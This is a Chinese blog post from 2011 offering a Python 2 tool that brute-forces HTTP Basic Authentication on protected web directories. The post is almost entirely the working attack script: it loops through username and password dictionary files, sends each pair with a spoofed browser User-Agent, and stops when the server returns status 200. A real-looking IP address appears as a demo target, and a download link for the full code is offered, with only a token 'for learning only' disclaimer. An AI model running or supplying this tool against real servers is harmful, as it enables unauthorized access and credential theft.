存档

文章标签 ‘Authorization 破解’

目录Authorization破解工具

2011年12月20日 3 条评论

Web目录下有一些文件不允许匿名访问(可以使用Tomcat、Apache、nginx等进行配制,来实现此效果),如下图:

可以使用以下代码+字典破解,运行结果如下:

主要代码如下(附件中有完整代码,仅供学习!请勿非法使用!):

#!/usr/bin/env python
#coding=utf-8
import sys
import os
import httplib2
import base64

def To_Base64(s):
    s=unicode(s)
    s=s.encode("utf-8")
    encoded = base64.b64encode(s)
    return encoded
def From_Base64(s):
    s=unicode(s)
    decoded = base64.b64decode(s)
    decoded=decoded.decode("utf-8")
    return decoded
def httpRequest(method,url,user_pass):
    if method=='get':
       h= httplib2.Http()
       res, content = h.request(url, 'GET',headers={'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:8.0.1) Gecko/20100101 Firefox/8.0.1',
       'Accept' : 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
       'Accept-Language' : 'zh-cn,zh;q=0.5',
       'Accept-Encoding':'gzip, deflate',
       'Accept-Charset':'GB2312,utf-8;q=0.7,*;q=0.7',
       'Proxy-Connection':'keep-alive',
       'Authorization':'Basic '+user_pass})
       startus=res.status
    elif method=='post':
        startus=''
#    print startus
    return startus
################  main  #####################
print '####################################################'
print ' # '+'www.007hack.com'+'  '
print ' # '+'author:admin#007hack.com'+'  '
print ' # '+'Please input a URL'+'  '
print ' # '+'Demo url: http://222.230.17.123'+' '
print ' # '+'Username :user.txt '+'  '
print ' # '+'Password :pass.txt '+'  '
print '#####################################################'

url=raw_input('Please input a url: ')
#url='http://222.230.17.123'

username=open('user.txt','r')
i=0
for username in username.readlines():
    if username!='':
        username="".join(username)
        if username[-1]=='\n':
            username=username[0:-1]
        userpass=open('pass.txt', 'r')
        for userpass in userpass.readlines():
            userpass="".join(userpass)
            if userpass[-1]=='\n':
                userpass=userpass[0:-1]
            user_pass=To_Base64(username+':'+userpass)
            startus=httpRequest('get', str(url), user_pass)
            if startus==200:
                print '####################################################'
                print '                     succeed:'+From_Base64(user_pass)
                print '####################################################'
                exit()
            else:
                i=i+1
                print str(i)+" "+username+':'+userpass

点击下载